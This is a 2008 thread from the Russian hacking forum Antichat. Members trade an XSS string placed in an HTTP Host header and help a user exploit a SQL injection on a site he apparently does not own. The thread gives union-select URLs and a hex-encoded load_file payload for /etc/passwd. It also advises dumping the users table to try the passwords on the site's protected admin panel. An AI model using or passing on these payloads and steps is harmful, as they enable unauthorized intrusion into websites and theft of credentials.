Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

10.01.2008, 01:25
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме: 5571194
Репутация:
1934
|
|
Host: <указать хост> =)
|
|
|

10.01.2008, 01:28
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме: 8042357
Репутация:
3742
|
|
GET /index.html HTTP/1.1
Host: SITE<xscript>alert('XSS');</xscript>.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Connection: Keep-Alive
ты отправляешь в никуда
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|

10.01.2008, 01:47
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме: 5571194
Репутация:
1934
|
|
Он отправляет на сайт SITE<xscript>alert('XSS');</xscript>.ru и запрашивает index.html =\
|
|
|

10.01.2008, 14:02
|
|
Познающий
Регистрация: 19.11.2007
Сообщений: 42
Провел на форуме: 374351
Репутация:
15
|
|
Помогите чем можете.
Есть сайт, на нем скуль инъекция.
site.ru/news.php?id=-1+union+select+1,2,333,444,5,6,7,8,9,10/*
выводятся столбцы 3 и 4
делаю так site.ru/news.php?id=-1+union+select+1,2,load_file('some_file'),444,5,6, 7,8,9,10/* - вылетает ошибка
делаю site.ru/news.php?id=-1+union+select+1,2,load_file(char(тут числа)),444,5,6,7,8,9,10/* - пустота, т.е. никаких ошибок не вылетает, просто вместо столбца 3 пустота ( в чем гемор ??
доступа к information_schema нет
на сайте нет форумов, нашел админку site.ru/admin/ , там доступ закрыт через .htacces
что посоветуете господа ?
|
|
|

10.01.2008, 14:30
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме: 1292655
Репутация:
168
|
|
это нормально, у пользователя mysql нет прав на чтение файлов. А ошибку выкидывает потомы что фильтруется кавычка.
что делать - подбирать таблицу с пользователями и надеятся что пароли подойдут к админке, а лучше ссылку на сайт
|
|
|

10.01.2008, 14:40
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
ну это совсем не факт
load_file(char(тут числа))
смотря каие там "тут числа", мож файла такого просто не существует, timlame, попробуй:
site.ru/news.php?id=-1+union+select+1,2,load_file(0x2F6574632F706173737 764),444,5,6,7,8,9,10/*
если не увидишь ничего, то или ось винда или файловых привилегий нет скорее второе
__________________
Карфаген должен быть разрушен...
|
|
|

10.01.2008, 16:08
|
|
Познающий
Регистрация: 19.11.2007
Сообщений: 42
Провел на форуме: 374351
Репутация:
15
|
|
т.е. в случае отсутствия файла load_file() возвращает пустую строчку ?
|
|
|

10.01.2008, 16:13
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
и в случае отсутствия файла и в случае если нет файловых привилегий
ошибка возникает тогда, когда ты в load_file() (при наличии file_priv) передал только имя не существующей директории
__________________
Карфаген должен быть разрушен...
|
|
|

10.01.2008, 16:48
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
Провел на форуме: 122329
Репутация:
-2
|
|
вместо сайт пусь буит www.debilko.ru
знач,как я понял,должно быть так:
GET /index.html HTTP/1.1
Host: debilko<xscript>alert('XSS');</xscript>.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Connection: Keep-Alive
йа пробывал и гет и пост. Вообще скажите, код то можно внедрить ?)
|
|
|

10.01.2008, 17:19
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме: 5571194
Репутация:
1934
|
|
GET /index.html HTTP/1.1
Host: debilko.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Connection: Keep-Alive
так должно быть. А ты вообще что хочешь сделать? Почитай про синтаксис http 1.0. Думаю, поймешь, че за чушь написал.
Последний раз редактировалось AFoST; 10.01.2008 в 17:22..
Причина: уточнил
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|